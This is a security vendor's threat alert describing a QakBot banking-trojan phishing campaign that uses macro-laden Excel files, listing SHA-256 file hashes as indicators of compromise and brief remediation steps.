Rewterz Threat Alert – SmokeLoader Malware – Active IOCs
December 27, 2021Rewterz Threat Alert – Quasar RAT – Active IOCs
December 28, 2021Rewterz Threat Alert – SmokeLoader Malware – Active IOCs
December 27, 2021Rewterz Threat Alert – Quasar RAT – Active IOCs
December 28, 2021Severity
Medium
Analysis Summary
A massive maldoc campaign delivering the QakBot/QBot banking trojan is detected. Qakbot leverages advanced techniques to evade detection and hamper manual analysis of the threat. QakBot attacks typically include a malicious attachment to a phishing email. Often these are bare Microsoft Word or Excel documents attached to the spam email. This particular campaign features an xls file that includes macros within the document. These macros execute a PowerShell script that then downloads the Qakbot payload from specific URLs. The attackers use a common tactic to lure the victim to enable macros: when the target downloads the file, it asks the target to enable editing and then enable content in order to view the document.
Impact
- Unauthorized Access
- Financial Theft
- Information Theft
Indicators of Compromise
SHA-256
- a9d6a4415b2357d00166efd1c761cb240922ef06c7138c9ce42e32587a0025c0
- 9ea0e87704b638607fc556ee4c2c302f4c73cdee77ff39f652a113aa7c99a22c
- df7b9a028c6061a6d3155cc4ee8cf24f3053beacf5419056bb90ae6f463521e6
- bdb85f576071e0ee13692a4385edab14ea88fddd321e635605b4ceabd5911360
- c0ebfab81fb04c8a136fd3fa18aed03160bb653308384f22216c3100268909e4
- b767e6c76ed8c061bb4328dae0f54c34013529fda62b2d94d93731e4007e2b47
- c485744426bf94d532b9e17b538e968247c8457d10aa6fe0ce50008fd00b4ef8
- f38b37376cc0d6681ff1640ad27b4442abe8a9d7116f2c344b536799584d3f74
- b797a754956e7699791fb88449cffcacd2432f86c307f3702e120294b6a58cb5
- b898a6aeaacfca8f1a729f94b83f4a2dd4106d19716c782db144afa641aaadb2
- 18033fd74500cd32eb7edbf955074467087554e6d5cce3cca8f422eb2e2fe198
- a5bc328591c50bf58533596432a8845c0958bbf9a6f373580854eb8032c09143
- c4a86707a2f09d097e24163631da988e9b04769fe5a60e1401210d37021a238d
- ee4c6e06181e96edac84934a66297590780e3934a51051fa4cef9885213b6584
- a5a60ae6d1ada77f63791f9191cd5e5c42964d7100795b2457ea67840e3e7c60
- 02b25b0759eb0ae458a41704fdf957035dbd7d1e610a8f77512ff08aec7da83f
- d0fd1a167e69af19410630ae357a9ad232dd400c2867a2548a6aa0c3e9717b21
- 0482b6ba956975564976d1941f2e921d269d08176a5bb6a19b0f5f334f30296e
- 099997029139bc1215e4317a688f7c14ffc330f969a4b4d8c251889d782188a7
- db50a9e8d4bce054571fd0dbf1e3dab1b6f139611483b72f899081d673aae626
Remediation
- Block the threat indicators at their respective controls.
- Seach for IOCs in your environment.